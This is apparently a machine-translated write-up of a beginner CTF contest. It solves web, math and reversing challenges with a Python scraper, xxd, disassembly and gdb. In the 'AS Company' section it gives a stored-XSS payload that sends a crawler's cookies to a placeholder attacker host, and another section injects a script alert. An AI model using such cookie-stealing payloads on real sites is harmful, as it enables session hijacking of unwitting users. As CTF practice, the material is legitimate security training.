This article was machine-translated from the Japanese version.

7th place out of 60+N people. The problems have not been made public.

Calc

An HTML version of “Te-Keisan Extremes” from SECCON Beginners CTF 2018. However, there is no time limit for the answers.

Get the mathematical expression and POST the result. Don’t forget to set the cookie for user identification.

import urllib.request
import urllib.parse
from bs4 import BeautifulSoup
from http.cookiejar import CookieJar

url = "http://10.2.6.1:8080/index.php"

opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(CookieJar()))
res = opener.open(url)
html = res.read().decode("utf-8")
soup = BeautifulSoup(html, "html.parser")
exp = soup.find("div").text

for _ in range(100):
    data = urllib.parse.urlencode({'answer':eval(exp)}).encode('utf-8')
    res = opener.open(url, data)
    html = res.read().decode("utf-8")
    print(html)
    soup = BeautifulSoup(html, "html.parser")
    exp = soup.find("div").text

do alert

Inject <script>alert(0)</script> into the provided form and reload.

AS Company

There is a page where you can post an arbitrary title and text via a form, and a crawler visits the posted results. The FLAG is written in the crawler’s UA.

Since you can inject scripts into the form, inject <script>document.location="http://<attacker>?"+encodeURIComponent(document.cookie)</script> into either the title or text, then check the crawler’s access logs.

Go Fast

Just do the calculations.

print(2**4085 % 97)

Factoring

Just factorising into primes

$ factor 2240118421
2240118421: 43223 51827

Find it.

You’re given an ELF file bin1. Use xxd to get the flag.

xxd bin1 | grep -A1 ctf
0001060: 6374 6634 627b 666c 3467 5f6e 3037 5f31  ctf4b{dummy____
0001070: 6e5f 6330 6433 5f35 3367 6d33 6e37 7d00  _________flag}.

Read it.

The FLAG is hard-coded in the genflag section.

00000000004005eb <genflag>:
  4005eb:       55                      push   rbp
  4005ec:       48 89 e5                mov    rbp,rsp
  4005ef:       48 83 ec 50             sub    rsp,0x50
  4005f3:       64 48 8b 04 25 28 00    mov    rax,QWORD PTR fs:0x28
  4005fa:       00 00
  4005fc:       48 89 45 f8             mov    QWORD PTR [rbp-0x8],rax
  400600:       31 c0                   xor    eax,eax
  400602:       c6 45 c0 63             mov    BYTE PTR [rbp-0x40],0x63
  400606:       c6 45 c1 74             mov    BYTE PTR [rbp-0x3f],0x74
  40060a:       c6 45 c2 66             mov    BYTE PTR [rbp-0x3e],0x66
  40060e:       c6 45 c3 34             mov    BYTE PTR [rbp-0x3d],0x34
  400612:       c6 45 c4 62             mov    BYTE PTR [rbp-0x3c],0x62
  400616:       c6 45 c5 7b             mov    BYTE PTR [rbp-0x3b],0x7b
  40061a:       c6 45 c6 63             mov    BYTE PTR [rbp-0x3a],0x63
  40061e:       c6 45 c7 34             mov    BYTE PTR [rbp-0x39],0x34
----- snip -----

Disassemble It.

You’re given an ELF file that asks for a password. Run it in gdb-peda.

$ ./bin3
Password : invalid password
Wrong..

[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffe3e0 --> 0x64696c61766e69 ('invalid')
RBX: 0x0
RCX: 0x0
RDX: 0x1
RSI: 0x555555556016 --> 0x57004e4f43434553 ('SECCON')
RDI: 0x7fffffffe3e0 --> 0x64696c61766e69 ('invalid')
RBP: 0x7fffffffe4b0 --> 0x0
RSP: 0x7fffffffe3d0 --> 0xffffe400
RIP: 0x555555555211 (<main+136>:        call   0x555555555060 <strcmp@plt>)
R8 : 0x7ffff7dd5060 --> 0x7ffff7dd29e0 --> 0x7ffff7b96712 --> 0x2e2e00544d470043 ('C')
R9 : 0x7ffff7b81200 --> 0x2000200020002
R10: 0x0
R11: 0x246
R12: 0x555555555090 (<_start>:  repz nop edx)
R13: 0x7fffffffe590 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x555555555200 <main+119>:   lea    rax,[rbp-0xd0]
   0x555555555207 <main+126>:   lea    rsi,[rip+0xe08]        # 0x555555556016
   0x55555555520e <main+133>:   mov    rdi,rax
=> 0x555555555211 <main+136>:   call   0x555555555060 <strcmp@plt>
   0x555555555216 <main+141>:   test   eax,eax
   0x555555555218 <main+143>:   je     0x555555555235 <main+172>
   0x55555555521a <main+145>:   lea    rdi,[rip+0xdfc]        # 0x55555555601d
   0x555555555221 <main+152>:   mov    eax,0x0
Guessed arguments:
arg[0]: 0x7fffffffe3e0 --> 0x64696c61766e69 ('invalid')
arg[1]: 0x555555556016 --> 0x57004e4f43434553 ('SECCON')
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe3d0 --> 0xffffe400
0008| 0x7fffffffe3d8 --> 0x2
0016| 0x7fffffffe3e0 --> 0x64696c61766e69 ('invalid')
0024| 0x7fffffffe3e8 --> 0x0
0032| 0x7fffffffe3f0 --> 0x0
0040| 0x7fffffffe3f8 --> 0x0
0048| 0x7fffffffe400 --> 0x0
0056| 0x7fffffffe408 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0000555555555211 in main ()
gdb-peda$

Since it’s comparing the input string with ‘SECCON’, I’d guess that this is the password.

./bin3
Password : SECCON
Okay, Process a one byte..
Password : SECCON
Okay, Process a one byte..
Password : SECCON
Okay, Process a one byte..
----- snip -----

Since it kept asking for the same password, I piped in ‘SECCON’ and got the flag.

echo 'SECCON' | ./bin3
Password : Okay, Process a one byte..
Password : Okay, Process a one byte..
Password : Okay, Process a one byte..
Password : Okay, Process a one byte..
----- snip -----
Password : Okay, Process a one byte..
DONE -> FLAG : ctf4b{DUMMY}